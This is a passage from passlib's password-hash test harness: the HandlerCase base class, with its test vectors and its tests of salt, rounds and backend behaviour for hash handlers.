digest = hashlib.sha256(source.encode("utf-8")).hexdigest()
seed = int(digest[:16], 16)
# create rng
value = cache[name] = random.Random(seed)
return value
#===================================================================
# other
#===================================================================
_mktemp_queue = None
def mktemp(self, *args, **kwds):
"""create temp file that's cleaned up at end of test"""
self.require_writeable_filesystem()
fd, path = tempfile.mkstemp(*args, **kwds)
os.close(fd)
queue = self._mktemp_queue
if queue is None:
queue = self._mktemp_queue = []
def cleaner():
for path in queue:
if os.path.exists(path):
os.remove(path)
del queue[:]
self.addCleanup(cleaner)
queue.append(path)
return path
def patchAttr(self, obj, attr, value, require_existing=True, wrap=False):
"""monkeypatch object value, restoring original value on cleanup"""
try:
orig = getattr(obj, attr)
except AttributeError:
if require_existing:
raise
def cleanup():
try:
delattr(obj, attr)
except AttributeError:
pass
self.addCleanup(cleanup)
else:
self.addCleanup(setattr, obj, attr, orig)
if wrap:
value = partial(value, orig)
wraps(orig)(value)
setattr(obj, attr, value)
#===================================================================
# eoc
#===================================================================
#=============================================================================
# other unittest helpers
#=============================================================================
RESERVED_BACKEND_NAMES = ["any", "default"]
class HandlerCase(TestCase):
"""base class for testing password hash handlers (esp passlib.utils.handlers subclasses)
In order to use this to test a handler,
create a subclass with all the appropriate attributes
filled as listed in the example below,
and run the subclass via unittest.
.. todo::
Document all of the options HandlerCase offers.
.. note::
This is subclass of :class:`unittest.TestCase`
(or :class:`unittest2.TestCase` if available).
"""
#===================================================================
# class attrs - should be filled in by subclass
#===================================================================
#---------------------------------------------------------------
# handler setup
#---------------------------------------------------------------
# handler class to test [required]
handler = None
# if set, run tests against specified backend
backend = None
#---------------------------------------------------------------
# test vectors
#---------------------------------------------------------------
# list of (secret, hash) tuples which are known to be correct
known_correct_hashes = []
# list of (config, secret, hash) tuples which are known to be correct
known_correct_configs = []
# list of (alt_hash, secret, hash) tuples, where alt_hash is a hash
# using an alternate representation that should be recognized and verify
# correctly, but should be corrected to match hash when passed through
# genhash()
known_alternate_hashes = []
# hashes so malformed they aren't even identified properly
known_unidentified_hashes = []
# hashes which are identifiable but malformed - they should identify()
# as True, but cause an error when passed to genhash/verify.
known_malformed_hashes = []
# list of (handler name, hash) pairs for other algorithm's hashes that
# handler shouldn't identify as belonging to it. this list should generally
# be sufficient (if the handler name is in the list, that entry will be skipped)
known_other_hashes = [
('des_crypt', '6f8c114b58f2c'),
('md5_crypt', '$1$dOHYPKoP$tnxS1T8Q6VVn3kpV8cN6o.'),
('sha512_crypt', "$6$rounds=123456$asaltof16chars..$BtCwjqMJGx5hrJhZywW"
"vt0RLE8uZ4oPwcelCjmw2kSYu.Ec6ycULevoBK25fs2xXgMNrCzIMVcgEJAstJeonj1"),
]
# passwords used to test basic hash behavior - generally
# don't need to be overridden.
stock_passwords = [
u("test"),
u("\u20AC\u00A5$"),
b'\xe2\x82\xac\xc2\xa5$'
]
#---------------------------------------------------------------
# option flags
#---------------------------------------------------------------
# whether hash is case insensitive
# True, False, or special value "verify-only" (which indicates
# hash contains a case-sensitive portion, but verification is case-insensitive)
secret_case_insensitive = False
# flag if scheme accepts ALL hash strings (e.g. plaintext)
accepts_all_hashes = False
# flag if scheme has "is_disabled" set, and contains 'salted' data
disabled_contains_salt = False
# flag/hack to filter PasslibHashWarning issued by test_72_configs()
filter_config_warnings = False
# forbid certain characters in passwords
@classproperty
def forbidden_characters(cls):
# anything that supports crypt() interface should forbid null chars,
# since crypt() uses null-terminated strings.
if 'os_crypt' in getattr(cls.handler, "backends", ()):
return b"\x00"
return None
#===================================================================
# internal class attrs
#===================================================================
__unittest_skip = True
@property
def descriptionPrefix(self):
handler = self.handler
name = handler.name
if hasattr(handler, "get_backend"):
name += " (%s backend)" % (handler.get_backend(),)
return name
#===================================================================
# support methods
#===================================================================
#---------------------------------------------------------------
# configuration helpers
#---------------------------------------------------------------
@classmethod
def iter_known_hashes(cls):
"""iterate through known (secret, hash) pairs"""
for secret, hash in cls.known_correct_hashes:
yield secret, hash
for config, secret, hash in cls.known_correct_configs:
yield secret, hash
for alt, secret, hash in cls.known_alternate_hashes:
yield secret, hash
def get_sample_hash(self):
"""test random sample secret/hash pair"""
known = list(self.iter_known_hashes())
return self.getRandom().choice(known)
#---------------------------------------------------------------
# test helpers
#---------------------------------------------------------------
def check_verify(self, secret, hash, msg=None, negate=False):
"""helper to check verify() outcome, honoring is_disabled_handler"""
result = self.do_verify(secret, hash)
self.assertTrue(result is True or result is False,
"verify() returned non-boolean value: %r" % (result,))
if self.handler.is_disabled or negate:
if not result:
return
if not msg:
msg = ("verify incorrectly returned True: secret=%r, hash=%r" %
(secret, hash))
raise self.failureException(msg)
else:
if result:
return
if not msg:
msg = "verify failed: secret=%r, hash=%r" % (secret, hash)
raise self.failureException(msg)
def check_returned_native_str(self, result, func_name):
self.assertIsInstance(result, str,
"%s() failed to return native string: %r" % (func_name, result,))
#---------------------------------------------------------------
# PasswordHash helpers - wraps all calls to PasswordHash api,
# so that subclasses can fill in defaults and account for other specialized behavior
#---------------------------------------------------------------
def populate_settings(self, kwds):
"""subclassable method to populate default settings"""
# use lower rounds settings for certain test modes
handler = self.handler
if 'rounds' in handler.setting_kwds and 'rounds' not in kwds:
mn = handler.min_rounds
df = handler.default_rounds
if TEST_MODE(max="quick"):
# use minimum rounds for quick mode
kwds['rounds'] = max(3, mn)
else:
# use default/8 otherwise
factor = 3
if getattr(handler, "rounds_cost", None) == "log2":
df -= factor
else:
df //= (1<<factor)
kwds['rounds'] = max(3, mn, df)
def populate_context(self, secret, kwds):
"""subclassable method allowing 'secret' to be encode context kwds"""
return secret
# TODO: rename to do_hash() to match new API
def do_encrypt(self, secret, use_encrypt=False, handler=None, context=None, **settings):
"""call handler's hash() method with specified options"""
self.populate_settings(settings)
if context is None:
context = {}
secret = self.populate_context(secret, context)
if use_encrypt:
# use legacy 1.6 api
warnings = []
if settings:
context.update(**settings)
warnings.append("passing settings to.*is deprecated")
with self.assertWarningList(warnings):
return (handler or self.handler).encrypt(secret, **context)
else:
# use 1.7 api
return (handler or self.handler).using(**settings).hash(secret, **context)
def do_verify(self, secret, hash, handler=None, **kwds):
"""call handler's verify method"""
secret = self.populate_context(secret, kwds)
return (handler or self.handler).verify(secret, hash, **kwds)
def do_identify(self, hash):
"""call handler's identify method"""
return self.handler.identify(hash)
def do_genconfig(self, **kwds):
"""call handler's genconfig method with specified options"""
self.populate_settings(kwds)
return self.handler.genconfig(**kwds)
def do_genhash(self, secret, config, **kwds):
"""call handler's genhash method with specified options"""
secret = self.populate_context(secret, kwds)
return self.handler.genhash(secret, config, **kwds)
def do_stub_encrypt(self, handler=None, context=None, **settings):
"""
return sample hash for handler, w/o caring if digest is valid
(uses some monkeypatching to minimize digest calculation cost)
"""
handler = (handler or self.handler).using(**settings)
if context is None:
context = {}
secret = self.populate_context("", context)
with patch_calc_min_rounds(handler):
return handler.hash(secret, **context)
#---------------------------------------------------------------
# automatically generate subclasses for testing specific backends,
# and other backend helpers
#---------------------------------------------------------------
BACKEND_NOT_AVAILABLE = "backend not available"
@classmethod
def _get_skip_backend_reason(cls, backend):
"""
helper for create_backend_case() --
returns reason to skip backend, or None if backend should be tested
"""
handler = cls.handler
if not is_default_backend(handler, backend) and not TEST_MODE("full"):
return "only default backend is being tested"
if handler.has_backend(backend):
return None
return cls.BACKEND_NOT_AVAILABLE
@classmethod
def create_backend_case(cls, backend):
handler = cls.handler
name = handler.name
assert hasattr(handler, "backends"), "handler must support uh.HasManyBackends protocol"
assert backend in handler.backends, "unknown backend: %r" % (backend,)
bases = (cls,)
if backend == "os_crypt":
bases += (OsCryptMixin,)
subcls = type(
"%s_%s_test" % (name, backend),
bases,
dict(
descriptionPrefix="%s (%s backend)" % (name, backend),
backend=backend,
__module__=cls.__module__,
)
)
skip_reason = cls._get_skip_backend_reason(backend)
if skip_reason:
subcls = skip(skip_reason)(subcls)
return subcls
#===================================================================
# setup
#===================================================================
def setUp(self):
super(HandlerCase, self).setUp()
# if needed, select specific backend for duration of test
handler = self.handler
backend = self.backend
if backend:
if not hasattr(handler, "set_backend"):
raise RuntimeError("handler doesn't support multiple backends")
self.addCleanup(handler.set_backend, handler.get_backend())
handler.set_backend(backend)
# patch some RNG references so they're reproducible.
from passlib.utils import handlers
self.patchAttr(handlers, "rng", self.getRandom("salt generator"))
#===================================================================
# basic tests
#===================================================================
def test_01_required_attributes(self):
"""validate required attributes"""
handler = self.handler
def ga(name):
return getattr(handler, name, None)
#
# name should be a str, and valid
#
name = ga("name")
self.assertTrue(name, "name not defined:")
self.assertIsInstance(name, str, "name must be native str")
self.assertTrue(name.lower() == name, "name not lower-case:")
self.assertTrue(re.match("^[a-z0-9_]+$", name),
"name must be alphanum + underscore: %r" % (name,))
#
# setting_kwds should be specified
#
settings = ga("setting_kwds")
self.assertTrue(settings is not None, "setting_kwds must be defined:")
self.assertIsInstance(settings, tuple, "setting_kwds must be a tuple:")
#
# context_kwds should be specified
#
context = ga("context_kwds")
self.assertTrue(context is not None, "context_kwds must be defined:")
self.assertIsInstance(context, tuple, "context_kwds must be a tuple:")
# XXX: any more checks needed?
def test_02_config_workflow(self):
"""test basic config-string workflow
this tests that genconfig() returns the expected types,
and that identify() and genhash() handle the result correctly.
"""
#
# genconfig() should return native string.
# NOTE: prior to 1.7 could return None, but that's no longer allowed.
#
config = self.do_genconfig()
self.check_returned_native_str(config, "genconfig")
#
# genhash() should always accept genconfig()'s output,
# whether str OR None.
#
result = self.do_genhash('stub', config)
self.check_returned_native_str(result, "genhash")
#
# verify() should never accept config strings
#
# NOTE: changed as of 1.7 -- previously, .verify() should have
# rejected partial config strings returned by genconfig().
# as of 1.7, that feature is deprecated, and genconfig()
# always returns a hash (usually of the empty string)
# so verify should always accept its output
self.do_verify('', config) # usually true, but not required by protocol
#
# identify() should positively identify config strings if not None.
#
# NOTE: changed as of 1.7 -- genconfig() previously might return None,
# now must always return valid hash
self.assertTrue(self.do_identify(config),
"identify() failed to identify genconfig() output: %r" %
(config,))
def test_02_using_workflow(self):
"""test basic using() workflow"""
handler = self.handler
subcls = handler.using()
self.assertIsNot(subcls, handler)
self.assertEqual(subcls.name, handler.name)
# NOTE: other info attrs should match as well, just testing basic behavior.
# NOTE: mixin-specific args like using(min_rounds=xxx) tested later.
def test_03_hash_workflow(self, use_16_legacy=False):
"""test basic hash-string workflow.
this tests that hash()'s hashes are accepted
by verify() and identify(), and regenerated correctly by genhash().
the test is run against a couple of different stock passwords.
"""
wrong_secret = 'stub'
for secret in self.stock_passwords:
#
# hash() should generate native str hash
#
result = self.do_encrypt(secret, use_encrypt=use_16_legacy)
self.check_returned_native_str(result, "hash")
#
# verify() should work only against secret
#
self.check_verify(secret, result)
self.check_verify(wrong_secret, result, negate=True)
#
# genhash() should reproduce original hash
#
other = self.do_genhash(secret, result)
self.check_returned_native_str(other, "genhash")
if self.handler.is_disabled and self.disabled_contains_salt:
self.assertNotEqual(other, result, "genhash() failed to salt result "
"hash: secret=%r hash=%r: result=%r" %
(secret, result, other))
else:
self.assertEqual(other, result, "genhash() failed to reproduce "
"hash: secret=%r hash=%r: result=%r" %
(secret, result, other))
#
# genhash() should NOT reproduce original hash for wrong password
#
other = self.do_genhash(wrong_secret, result)
self.check_returned_native_str(other, "genhash")
if self.handler.is_disabled and not self.disabled_contains_salt:
self.assertEqual(other, result, "genhash() failed to reproduce "
"disabled-hash: secret=%r hash=%r other_secret=%r: result=%r" %
(secret, result, wrong_secret, other))
else:
self.assertNotEqual(other, result, "genhash() duplicated "
"hash: secret=%r hash=%r wrong_secret=%r: result=%r" %
(secret, result, wrong_secret, other))
#
# identify() should positively identify hash
#
self.assertTrue(self.do_identify(result))
def test_03_legacy_hash_workflow(self):
"""test hash-string workflow with legacy .encrypt() & .genhash() methods"""
self.test_03_hash_workflow(use_16_legacy=True)
def test_04_hash_types(self):
"""test hashes can be unicode or bytes"""
# this runs through workflow similar to 03, but wraps
# everything using tonn() so we test unicode under py2,
# and bytes under py3.
# hash using non-native secret
result = self.do_encrypt(tonn('stub'))
self.check_returned_native_str(result, "hash")
# verify using non-native hash
self.check_verify('stub', tonn(result))
# verify using non-native hash AND secret
self.check_verify(tonn('stub'), tonn(result))
# genhash using non-native hash
other = self.do_genhash('stub', tonn(result))
self.check_returned_native_str(other, "genhash")
if self.handler.is_disabled and self.disabled_contains_salt:
self.assertNotEqual(other, result)
else:
self.assertEqual(other, result)
# genhash using non-native hash AND secret
other = self.do_genhash(tonn('stub'), tonn(result))
self.check_returned_native_str(other, "genhash")
if self.handler.is_disabled and self.disabled_contains_salt:
self.assertNotEqual(other, result)
else:
self.assertEqual(other, result)
# identify using non-native hash
self.assertTrue(self.do_identify(tonn(result)))
def test_05_backends(self):
"""test multi-backend support"""
# check that handler supports multiple backends
handler = self.handler
if not hasattr(handler, "set_backend"):
raise self.skipTest("handler only has one backend")
# add cleanup func to restore old backend
self.addCleanup(handler.set_backend, handler.get_backend())
# run through each backend, make sure it works
for backend in handler.backends:
#
# validate backend name
#
self.assertIsInstance(backend, str)
self.assertNotIn(backend, RESERVED_BACKEND_NAMES,
"invalid backend name: %r" % (backend,))
#
# ensure has_backend() returns bool value
#
ret = handler.has_backend(backend)
if ret is True:
# verify backend can be loaded
handler.set_backend(backend)
self.assertEqual(handler.get_backend(), backend)
elif ret is False:
# verify backend CAN'T be loaded
self.assertRaises(MissingBackendError, handler.set_backend,
backend)
else:
# didn't return boolean object. commonly fails due to
# use of 'classmethod' decorator instead of 'classproperty'
raise TypeError("has_backend(%r) returned invalid "
"value: %r" % (backend, ret))
#===================================================================
# salts
#===================================================================
def require_salt(self):
if 'salt' not in self.handler.setting_kwds:
raise self.skipTest("handler doesn't have salt")
def require_salt_info(self):
self.require_salt()
if not has_salt_info(self.handler):
raise self.skipTest("handler doesn't provide salt info")
def test_10_optional_salt_attributes(self):
"""validate optional salt attributes"""
self.require_salt_info()
AssertionError = self.failureException
cls = self.handler
# check max_salt_size
mx_set = (cls.max_salt_size is not None)
if mx_set and cls.max_salt_size < 1:
raise AssertionError("max_salt_chars must be >= 1")
# check min_salt_size
if cls.min_salt_size < 0:
raise AssertionError("min_salt_chars must be >= 0")
if mx_set and cls.min_salt_size > cls.max_salt_size:
raise AssertionError("min_salt_chars must be <= max_salt_chars")
# check default_salt_size
if cls.default_salt_size < cls.min_salt_size:
raise AssertionError("default_salt_size must be >= min_salt_size")
if mx_set and cls.default_salt_size > cls.max_salt_size:
raise AssertionError("default_salt_size must be <= max_salt_size")
# check for 'salt_size' keyword
# NOTE: skipping warning if default salt size is already maxed out
# (might change that in future)
if 'salt_size' not in cls.setting_kwds and (not mx_set or cls.default_salt_size < cls.max_salt_size):
warn('%s: hash handler supports range of salt sizes, '
'but doesn\'t offer \'salt_size\' setting' % (cls.name,))
# check salt_chars & default_salt_chars
if cls.salt_chars:
if not cls.default_salt_chars:
raise AssertionError("default_salt_chars must not be empty")
for c in cls.default_salt_chars:
if c not in cls.salt_chars:
raise AssertionError("default_salt_chars must be subset of salt_chars: %r not in salt_chars" % (c,))
else:
if not cls.default_salt_chars:
raise AssertionError("default_salt_chars MUST be specified if salt_chars is empty")
@property
def salt_bits(self):
"""calculate number of salt bits in hash"""
# XXX: replace this with bitsize() method?
handler = self.handler
assert has_salt_info(handler), "need explicit bit-size for " + handler.name
from math import log
# FIXME: this may be off for case-insensitive hashes, but that accounts
# for ~1 bit difference, which is good enough for test_11()
return int(handler.default_salt_size *
log(len(handler.default_salt_chars), 2))
def test_11_unique_salt(self):
"""test hash() / genconfig() creates new salt each time"""
self.require_salt()
# odds of picking 'n' identical salts at random is '(.5**salt_bits)**n'.
# we want to pick the smallest N needed s.t. odds are <1/10**d, just
# to eliminate false-positives. which works out to n>3.33+d-salt_bits.
# for 1/1e12 odds, n=1 is sufficient for most hashes, but a few border cases (e.g.
# cisco_type7) have < 16 bits of salt, requiring more.
samples = max(1, 4 + 12 - self.salt_bits)
def sampler(func):
value1 = func()
for _ in irange(samples):
value2 = func()
if value1 != value2:
return
raise self.failureException("failed to find different salt after "
"%d samples" % (samples,))
sampler(self.do_genconfig)
sampler(lambda: self.do_encrypt("stub"))
def test_12_min_salt_size(self):
"""test hash() / genconfig() honors min_salt_size"""
self.require_salt_info()
handler = self.handler
salt_char = handler.salt_chars[0:1]
min_size = handler.min_salt_size
#
# check min is accepted
#
s1 = salt_char * min_size
self.do_genconfig(salt=s1)
self.do_encrypt('stub', salt_size=min_size)
#
# check min-1 is rejected
#
if min_size > 0:
self.assertRaises(ValueError, self.do_genconfig,
salt=s1[:-1])
self.assertRaises(ValueError, self.do_encrypt, 'stub',
salt_size=min_size-1)
def test_13_max_salt_size(self):
"""test hash() / genconfig() honors max_salt_size"""
self.require_salt_info()
handler = self.handler
max_size = handler.max_salt_size
salt_char = handler.salt_chars[0:1]
# NOTE: skipping this for hashes like argon2 since max_salt_size takes WAY too much memory
if max_size is None or max_size > (1 << 20):
#
# if it's not set, salt should never be truncated; so test it
# with an unreasonably large salt.
#
s1 = salt_char * 1024
c1 = self.do_stub_encrypt(salt=s1)
c2 = self.do_stub_encrypt(salt=s1 + salt_char)
self.assertNotEqual(c1, c2)
self.do_stub_encrypt(salt_size=1024)
else:
#
# check max size is accepted
#
s1 = salt_char * max_size
c1 = self.do_stub_encrypt(salt=s1)
self.do_stub_encrypt(salt_size=max_size)
#
# check max size + 1 is rejected
#
s2 = s1 + salt_char
self.assertRaises(ValueError, self.do_stub_encrypt, salt=s2)
self.assertRaises(ValueError, self.do_stub_encrypt, salt_size=max_size + 1)
#
# should accept too-large salt in relaxed mode
#
if has_relaxed_setting(handler):
with warnings.catch_warnings(record=True): # issues passlibhandlerwarning
c2 = self.do_stub_encrypt(salt=s2, relaxed=True)
self.assertEqual(c2, c1)
#
            # if min_salt_size allows it, check that a salt smaller than max is NOT truncated
#
if handler.min_salt_size < max_size:
c3 = self.do_stub_encrypt(salt=s1[:-1])
self.assertNotEqual(c3, c1)
# whether salt should be passed through bcrypt repair function
fuzz_salts_need_bcrypt_repair = False
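    # NOTE: bcrypt's 22-char salt string encodes a 128-bit value, so the final base64
    #       char carries 4 unused padding bits; bcrypt64.repair_unused() zeroes those
    #       bits so randomly generated salts match the canonical form backends emit.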
def prepare_salt(self, salt):
"""prepare generated salt"""
if self.fuzz_salts_need_bcrypt_repair:
from passlib.utils.binary import bcrypt64
salt = bcrypt64.repair_unused(salt)
return salt
def test_14_salt_chars(self):
"""test hash() honors salt_chars"""
self.require_salt_info()
handler = self.handler
mx = handler.max_salt_size
mn = handler.min_salt_size
cs = handler.salt_chars
raw = isinstance(cs, bytes)
# make sure all listed chars are accepted
for salt in batch(cs, mx or 32):
if len(salt) < mn:
salt = repeat_string(salt, mn)
salt = self.prepare_salt(salt)
self.do_stub_encrypt(salt=salt)
# check some invalid salt chars, make sure they're rejected
source = u('\x00\xff')
if raw:
source = source.encode("latin-1")
chunk = max(mn, 1)
for c in source:
if c not in cs:
self.assertRaises(ValueError, self.do_stub_encrypt, salt=c*chunk,
__msg__="invalid salt char %r:" % (c,))
@property
def salt_type(self):
"""hack to determine salt keyword's datatype"""
# NOTE: cisco_type7 uses 'int'
if getattr(self.handler, "_salt_is_bytes", False):
return bytes
else:
return unicode
def test_15_salt_type(self):
"""test non-string salt values"""
self.require_salt()
salt_type = self.salt_type
salt_size = getattr(self.handler, "min_salt_size", 0) or 8
# should always throw error for random class.
class fake(object):
pass
self.assertRaises(TypeError, self.do_encrypt, 'stub', salt=fake())
# unicode should be accepted only if salt_type is unicode.
if salt_type is not unicode:
self.assertRaises(TypeError, self.do_encrypt, 'stub', salt=u('x') * salt_size)
# bytes should be accepted only if salt_type is bytes,
# OR if salt type is unicode and running PY2 - to allow native strings.
if not (salt_type is bytes or (PY2 and salt_type is unicode)):
self.assertRaises(TypeError, self.do_encrypt, 'stub', salt=b'x' * salt_size)
def test_using_salt_size(self):
"""Handler.using() -- default_salt_size"""
self.require_salt_info()
handler = self.handler
mn = handler.min_salt_size
mx = handler.max_salt_size
df = handler.default_salt_size
# should prevent setting below handler limit
self.assertRaises(ValueError, handler.using, default_salt_size=-1)
with self.assertWarningList([PasslibHashWarning]):
temp = handler.using(default_salt_size=-1, relaxed=True)
self.assertEqual(temp.default_salt_size, mn)
# should prevent setting above handler limit
if mx:
self.assertRaises(ValueError, handler.using, default_salt_size=mx+1)
with self.assertWarningList([PasslibHashWarning]):
temp = handler.using(default_salt_size=mx+1, relaxed=True)
self.assertEqual(temp.default_salt_size, mx)
# try setting to explicit value
if mn != mx:
temp = handler.using(default_salt_size=mn+1)
self.assertEqual(temp.default_salt_size, mn+1)
self.assertEqual(handler.default_salt_size, df)
temp = handler.using(default_salt_size=mn+2)
self.assertEqual(temp.default_salt_size, mn+2)
self.assertEqual(handler.default_salt_size, df)
# accept strings
if mn == mx:
ref = mn
else:
ref = mn + 1
temp = handler.using(default_salt_size=str(ref))
self.assertEqual(temp.default_salt_size, ref)
# reject invalid strings
self.assertRaises(ValueError, handler.using, default_salt_size=str(ref) + "xxx")
# honor 'salt_size' alias
temp = handler.using(salt_size=ref)
self.assertEqual(temp.default_salt_size, ref)
#===================================================================
# rounds
#===================================================================
def require_rounds_info(self):
if not has_rounds_info(self.handler):
raise self.skipTest("handler lacks rounds attributes")
def test_20_optional_rounds_attributes(self):
"""validate optional rounds attributes"""
self.require_rounds_info()
cls = self.handler
AssertionError = self.failureException
# check max_rounds
if cls.max_rounds is None:
raise AssertionError("max_rounds not specified")
if cls.max_rounds < 1:
raise AssertionError("max_rounds must be >= 1")
# check min_rounds
if cls.min_rounds < 0:
raise AssertionError("min_rounds must be >= 0")
if cls.min_rounds > cls.max_rounds:
raise AssertionError("min_rounds must be <= max_rounds")
# check default_rounds
if cls.default_rounds is not None:
if cls.default_rounds < cls.min_rounds:
raise AssertionError("default_rounds must be >= min_rounds")
if cls.default_rounds > cls.max_rounds:
raise AssertionError("default_rounds must be <= max_rounds")
# check rounds_cost
if cls.rounds_cost not in rounds_cost_values:
raise AssertionError("unknown rounds cost constant: %r" % (cls.rounds_cost,))
def test_21_min_rounds(self):
"""test hash() / genconfig() honors min_rounds"""
self.require_rounds_info()
handler = self.handler
min_rounds = handler.min_rounds
# check min is accepted
self.do_genconfig(rounds=min_rounds)
self.do_encrypt('stub', rounds=min_rounds)
# check min-1 is rejected
self.assertRaises(ValueError, self.do_genconfig, rounds=min_rounds-1)
self.assertRaises(ValueError, self.do_encrypt, 'stub', rounds=min_rounds-1)
# TODO: check relaxed mode clips min-1
def test_21b_max_rounds(self):
"""test hash() / genconfig() honors max_rounds"""
self.require_rounds_info()
handler = self.handler
max_rounds = handler.max_rounds
if max_rounds is not None:
# check max+1 is rejected
self.assertRaises(ValueError, self.do_genconfig, rounds=max_rounds+1)
self.assertRaises(ValueError, self.do_encrypt, 'stub', rounds=max_rounds+1)
# handle max rounds
if max_rounds is None:
self.do_stub_encrypt(rounds=(1 << 31) - 1)
else:
self.do_stub_encrypt(rounds=max_rounds)
# TODO: check relaxed mode clips max+1
#--------------------------------------------------------------------------------------
# HasRounds.using() / .needs_update() -- desired rounds limits
#--------------------------------------------------------------------------------------
def _create_using_rounds_helper(self):
"""
setup test helpers for testing handler.using()'s rounds parameters.
"""
self.require_rounds_info()
handler = self.handler
if handler.name == "bsdi_crypt":
            # hack to bypass bsdi-crypt's "odd rounds only" behavior, which messes up this test
orig_handler = handler
handler = handler.using()
handler._generate_rounds = classmethod(lambda cls: super(orig_handler, cls)._generate_rounds())
# create some fake values to test with
orig_min_rounds = handler.min_rounds
orig_max_rounds = handler.max_rounds
orig_default_rounds = handler.default_rounds
medium = ((orig_max_rounds or 9999) + orig_min_rounds) // 2
if medium == orig_default_rounds:
medium += 1
small = (orig_min_rounds + medium) // 2
large = ((orig_max_rounds or 9999) + medium) // 2
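        # (e.g. for a hypothetical handler with min_rounds=4, max_rounds=31, and a
        #  different default: medium=(31+4)//2=17, small=(4+17)//2=10, large=(31+17)//2=24)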
if handler.name == "bsdi_crypt":
# hack to avoid even numbered rounds
small |= 1
medium |= 1
large |= 1
adj = 2
else:
adj = 1
# create a subclass with small/medium/large as new default desired values
with self.assertWarningList([]):
subcls = handler.using(
min_desired_rounds=small,
max_desired_rounds=large,
default_rounds=medium,
)
# return helpers
return handler, subcls, small, medium, large, adj
def test_has_rounds_using_harness(self):
"""
HasRounds.using() -- sanity check test harness
"""
# setup helpers
self.require_rounds_info()
handler = self.handler
orig_min_rounds = handler.min_rounds
orig_max_rounds = handler.max_rounds
orig_default_rounds = handler.default_rounds
handler, subcls, small, medium, large, adj = self._create_using_rounds_helper()
# shouldn't affect original handler at all
self.assertEqual(handler.min_rounds, orig_min_rounds)
self.assertEqual(handler.max_rounds, orig_max_rounds)
self.assertEqual(handler.min_desired_rounds, None)
self.assertEqual(handler.max_desired_rounds, None)
self.assertEqual(handler.default_rounds, orig_default_rounds)
# should affect subcls' desired value, but not hard min/max
self.assertEqual(subcls.min_rounds, orig_min_rounds)
self.assertEqual(subcls.max_rounds, orig_max_rounds)
self.assertEqual(subcls.default_rounds, medium)
self.assertEqual(subcls.min_desired_rounds, small)
self.assertEqual(subcls.max_desired_rounds, large)
def test_has_rounds_using_w_min_rounds(self):
"""
HasRounds.using() -- min_rounds / min_desired_rounds
"""
# setup helpers
handler, subcls, small, medium, large, adj = self._create_using_rounds_helper()
orig_min_rounds = handler.min_rounds
orig_max_rounds = handler.max_rounds
orig_default_rounds = handler.default_rounds
# .using() should clip values below valid minimum, w/ warning
if orig_min_rounds > 0:
self.assertRaises(ValueError, handler.using, min_desired_rounds=orig_min_rounds - adj)
with self.assertWarningList([PasslibHashWarning]):
temp = handler.using(min_desired_rounds=orig_min_rounds - adj, relaxed=True)
self.assertEqual(temp.min_desired_rounds, orig_min_rounds)
# .using() should clip values above valid maximum, w/ warning
if orig_max_rounds:
self.assertRaises(ValueError, handler.using, min_desired_rounds=orig_max_rounds + adj)
with self.assertWarningList([PasslibHashWarning]):
temp = handler.using(min_desired_rounds=orig_max_rounds + adj, relaxed=True)
self.assertEqual(temp.min_desired_rounds, orig_max_rounds)
# .using() should allow values below previous desired minimum, w/o warning
with self.assertWarningList([]):
temp = subcls.using(min_desired_rounds=small - adj)
self.assertEqual(temp.min_desired_rounds, small - adj)
# .using() should allow values w/in previous range
temp = subcls.using(min_desired_rounds=small + 2 * adj)
self.assertEqual(temp.min_desired_rounds, small + 2 * adj)
# .using() should allow values above previous desired maximum, w/o warning
with self.assertWarningList([]):
temp = subcls.using(min_desired_rounds=large + adj)
self.assertEqual(temp.min_desired_rounds, large + adj)
# hash() etc should allow explicit values below desired minimum
# NOTE: formerly issued a warning in passlib 1.6, now just a wrapper for .using()
self.assertEqual(get_effective_rounds(subcls, small + adj), small + adj)
self.assertEqual(get_effective_rounds(subcls, small), small)
with self.assertWarningList([]):
self.assertEqual(get_effective_rounds(subcls, small - adj), small - adj)
# 'min_rounds' should be treated as alias for 'min_desired_rounds'
temp = handler.using(min_rounds=small)
self.assertEqual(temp.min_desired_rounds, small)
# should be able to specify strings
temp = handler.using(min_rounds=str(small))
self.assertEqual(temp.min_desired_rounds, small)
# invalid strings should cause error
self.assertRaises(ValueError, handler.using, min_rounds=str(small) + "xxx")
def test_has_rounds_replace_w_max_rounds(self):
"""
HasRounds.using() -- max_rounds / max_desired_rounds
"""
# setup helpers
handler, subcls, small, medium, large, adj = self._create_using_rounds_helper()
orig_min_rounds = handler.min_rounds
orig_max_rounds = handler.max_rounds
# .using() should clip values below valid minimum w/ warning
if orig_min_rounds > 0:
self.assertRaises(ValueError, handler.using, max_desired_rounds=orig_min_rounds - adj)
with self.assertWarningList([PasslibHashWarning]):
temp = handler.using(max_desired_rounds=orig_min_rounds - adj, relaxed=True)
self.assertEqual(temp.max_desired_rounds, orig_min_rounds)
# .using() should clip values above valid maximum, w/ warning
if orig_max_rounds:
self.assertRaises(ValueError, handler.using, max_desired_rounds=orig_max_rounds + adj)
with self.assertWarningList([PasslibHashWarning]):
temp = handler.using(max_desired_rounds=orig_max_rounds + adj, relaxed=True)
self.assertEqual(temp.max_desired_rounds, orig_max_rounds)
# .using() should clip values below previous minimum, w/ warning
with self.assertWarningList([PasslibConfigWarning]):
temp = subcls.using(max_desired_rounds=small - adj)
self.assertEqual(temp.max_desired_rounds, small)
# .using() should reject explicit min > max
self.assertRaises(ValueError, subcls.using,
min_desired_rounds=medium+adj,
max_desired_rounds=medium-adj)
# .using() should allow values w/in previous range
temp = subcls.using(min_desired_rounds=large - 2 * adj)
self.assertEqual(temp.min_desired_rounds, large - 2 * adj)
# .using() should allow values above previous desired maximum, w/o warning
with self.assertWarningList([]):
temp = subcls.using(max_desired_rounds=large + adj)
self.assertEqual(temp.max_desired_rounds, large + adj)
# hash() etc should allow explicit values above desired minimum, w/o warning
# NOTE: formerly issued a warning in passlib 1.6, now just a wrapper for .using()
self.assertEqual(get_effective_rounds(subcls, large - adj), large - adj)
self.assertEqual(get_effective_rounds(subcls, large), large)
with self.assertWarningList([]):
self.assertEqual(get_effective_rounds(subcls, large + adj), large + adj)
# 'max_rounds' should be treated as alias for 'max_desired_rounds'
temp = handler.using(max_rounds=large)
self.assertEqual(temp.max_desired_rounds, large)
# should be able to specify strings
temp = handler.using(max_desired_rounds=str(large))
self.assertEqual(temp.max_desired_rounds, large)
# invalid strings should cause error
self.assertRaises(ValueError, handler.using, max_desired_rounds=str(large) + "xxx")
def test_has_rounds_using_w_default_rounds(self):
"""
HasRounds.using() -- default_rounds
"""
# setup helpers
handler, subcls, small, medium, large, adj = self._create_using_rounds_helper()
orig_max_rounds = handler.max_rounds
# XXX: are there any other cases that need testing?
# implicit default rounds -- increase to min_rounds
